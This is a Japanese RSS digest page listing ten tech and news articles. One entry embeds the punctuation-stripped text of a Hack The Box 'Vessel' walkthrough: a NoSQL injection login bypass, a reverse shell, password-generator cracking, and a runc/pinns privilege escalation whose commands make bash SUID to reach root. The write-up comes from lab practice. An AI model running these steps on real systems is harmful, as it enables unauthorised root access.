投稿時間:2023-02-18 16:09:10 RSSフィード2023-02-18 16:00 分まとめ(10件)
カテゴリー等 | サイト名等 | 記事タイトル・トレンドワード等 | リンクURL | 頻出ワード・要約等/検索ボリューム | 登録日 |
---|---|---|---|---|---|
IT | ITmedia 総合記事一覧 | [ITmedia Mobile] ミドルレンジスマホも少し高くなった予感がします | https://www.itmedia.co.jp/mobile/articles/2302/18/news061.html | aquos | 2023-02-18 15:45:00 |
TECH | Techable(テッカブル) | ゲームで稼ぐ?ヒューマンアカデミー、NFTに触れ学べる学生特化型のゲーミングギルド設立 | https://techable.jp/archives/195982 | 最新技術 | 2023-02-18 06:00:57 |
python | Pythonタグが付けられた新着投稿 - Qiita | サッカーの試合データを収集したい〜データ分析〜 | https://qiita.com/wooooo/items/ef97c50e6c8daa531420 | 川崎フロンターレ | 2023-02-18 15:43:16 |
Docker | dockerタグが付けられた新着投稿 - Qiita | Linuxディストリビューションの確認方法 | https://qiita.com/kaburankattara/items/ecc4c77303d4fb8c01ab | linux | 2023-02-18 15:15:33 |
Git | Gitタグが付けられた新着投稿 - Qiita | Gitでチェックアウトする際に同期されるかのまとめ | https://qiita.com/f-suzuki/items/4c65950c71e3fe389348 | qiita | 2023-02-18 15:58:57 |
Git | Gitタグが付けられた新着投稿 - Qiita | GitとGitHubを基本からまとめてみた【GitHubでチーム開発する方法】 | https://qiita.com/kanfutrooper/items/a9a5f9892c49f99c76ce | github | 2023-02-18 15:14:25 |
海外TECH | DEV Community | Hack The Box - Vessel [Hard] - Walkthrough | https://dev.to/syrull/hack-the-box-vessel-hard-walkthrough-a01 | Hack The Box Vessel Hard Walkthrough OverviewSince it becomes very time consuming doing this in a video this write up is going to be in a text The machine is labeled hard with a good reason most of the tasks are time consuming but there are some interesting vulnerabilities like CVE and CVE On top of these we have NoSQL Injection and some PE reverse engineering Write up Flag First I began enumerating the whole website with ffuf ffuf w Tools SecLists Discovery Web Content common txt u fs With that I discovered a folder called dev which then led me to dumping the git repository of the website git dumper website dumpWith the website avaliable I can check the actual source code for vulnerabilities immediately after opening the routes index js I have noticed that this code might be vulnerable to NoSQL Injection let username req body username let password req body password if username amp amp password connection query SELECT FROM accounts WHERE username AND password username password function error results fields The code doesn t check if the passed values if they are objects I can use a crafted NoSQL payload to successfully login with the admin user using this payload while doing the POST request username admin amp password password Upon another discovery in the admin panel I found that there is another domain on the host called openwebanalytics From further investigation over what can be exploted there I have landed on CVE With that exploit I could run a successful reverse shell on the machine Using linpeas I found some useful information over the user steven home steven passwordGenerator Windows PE Exectuable home steven notes screenshot png Screenshot of some program home steven notes notes pdf Password protected PDFI suspected that the screenshot png is am image of the passwordGenerator On the other hand the passwordGenerator was unusually big and the whole use of that binary is to create secure passwords I noticed the python icon on the binary and I suspected that this could be a packed python project with PyInstaller I confirmed that when I loaded the whole thing in Ghidra IDA I have used pyinstxtractor to extract the pyc files and then the uncomplyle to decompile the pyc files Which has led me to the actual source code of the binary This is the function that generates the password def genPassword self length value char index if char charset ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz amp lt gt else if char charset ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz else if char charset ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz else try qsrand QTime currentTime msec password for i in range length idx qrand len charset nchar charset idx password str nchar except msg QMessageBox msg setWindowTitle Error msg setText Error while generating password Send a message to the Author x msg exec return passwordI edited the length to as I have it on the screenshot and edited the script a bit more to create a list out of possible passwords I can do that because the QTime currentTime msec function returns the numbers from with that range I have a big chance of guessing the generated password Note This process can be a bit frustrating since it takes time to generate the passwords I personally spent little over an hour Then I used pdfcrack to crack the password of the PDF there I found the password for the user ethan and I successfully logged in with it and I found the first flag Flag I ran linpeas sh again and I found the following SUID binary ╔══════════╣Readable files belonging to root and readable by me but not world readable rwsr x root ethan Mar usr bin pinns I searched around a bit what is this and I landed on the CVE which exploited this binary While doing this I noticed that I also have the runc ╔══════════╣Container related tools present usr sbin runc This was a very tricky one and it needs some understanding of what s going on to successfully execute the attack You can check out the link I ve provided for CVE to understand more about it On the actual POC they have used Kubernetes on our end I had to use runc The parameters that are being passed to pinns are not being sanitized and validated so I can use that to execute code with root access I needed to create a container using the runc without using root so I ve used the rootless arg Reference rootless containers mkdir tmp syl cd tmp syl runc spec rootless mkdir rootfs echo chmod s usr bin bash gt syl shThen I should mount the root to the root of the container Reference runc root tmp syl run alpine cat etc machine idccaabdccafbThis will run the container and spawn a shell Next I would ssh into the machine from another session to execute the pinns binary to our container usr bin pinns d var run f ccaabdccafb s kernel shm rmid forced kernel core pattern tmp syl syl sh ipc net uts cgroupThen I need to trigger a core dump so that the pinns would execute the script in a case of a core dump Following the PoC in crowdstrike ulimit c unlimited ulimit cunlimited tail f dev null amp ps Find the tail f dev null PID kill SIGSEGV thePID Segmentation fault core dumped tail f dev nullBack to the other session bash p cat root root txt HASH | 2023-02-18 06:35:10 |
海外TECH | DEV Community | Tiny CRM - Linode + DEV Hackathon Submission | https://dev.to/frikishaan/tiny-crm-linode-dev-hackathon-submission-5gc1 | Tiny CRM Linode DEV Hackathon Submission What I builtI have built a CRM Customer Relationship Management system named TinyCRM Category Submission I am submitting this project in the SaaS Superstars category As this project has a potential to become a profitable SaaS product App LinkThe demo of the application is available here Use the below credentials to login Email admin tinycrm comPassword passwordNote The test data is refreshed every hour Screenshots DescriptionThis CRM systems help SMEs tracking their sales and manage the customer relationships easily This app has the following entities in it Account Stores the information of client organisation Contact Stores the information of the individual contacts in the client s organisation Lead Stores the information of Potential clients Deal Stores the information of Opportunities Products Stores the list of products that the company sell Link to Source Code frikishaan tiny crm This app created for hackathon on Dev to Tiny crmThis is a app created for Linode hackathon on Dev Tech stackPHP Laravel Filament PHPTailwind CSSAlpine JSPostgreSQLLive demoThe live demo of app is available here Local InstallationClone the repositoryRun the following commands composer install installing php dependenciesnpm install installing the JS dependenciesnpm run build to build the frontend assetsReplace the database credentials in the env file DB CONNECTION pgsqlDB HOST DB PORT DB DATABASE tiny crmDB USERNAME postgresDB PASSWORD passwordNow run the following command to create the required tables in database php artisan migrateOptionally you can create the dummy data by running the seeder as php artisan db seed View on GitHub Permissive LicenseMIT license BackgroundThere are a lot of CRM systems available in the market currently such as Salesforce Microsoft Dynamics etc The problem with these systems are that they are very broad and quite expensive and not easy to use and also needs a dedicated developer to manage it which becomes hard for SMEs to use and keep using these systems So I decided to make a CRM system which is easy to use have important required functionalities and at the same time not too expensive for SMEs How I built itI have used linode s compute instances for servers and the linode s managed PostgreSQL databasefor persistent storage While making this app I have learned to create compute instances in the linode s cloud platform I have also learned installing Ngnix server and SSL certificate on the server I have also learned creating a managed database instance on cloud and why it is an easy solution for solo devs and small teams as one does not need to manage the database by themselves I have used Laravel web framework for creating the app I have also used Filament admin panel generator to quickly generate CRUD app functionality Additional Resources InfoBuilt a website using Laravel framework on LinodeLinode Products | 2023-02-18 06:04:06 |
海外TECH | CodeProject Latest Articles | Result Builder in Swift for MVVM Pattern | https://www.codeproject.com/Tips/5353219/Result-Builder-in-Swift-for-MVVM-Pattern | builder | 2023-02-18 06:44:00 |
ニュース | BBC News - Home | The Papers: 'Rebellion' on NI Brexit deal and gas at 18-month low | https://www.bbc.co.uk/news/blogs-the-papers-64685148?at_medium=RSS&at_campaign=KARANGA | europe | 2023-02-18 06:00:47 |
コメント
コメントを投稿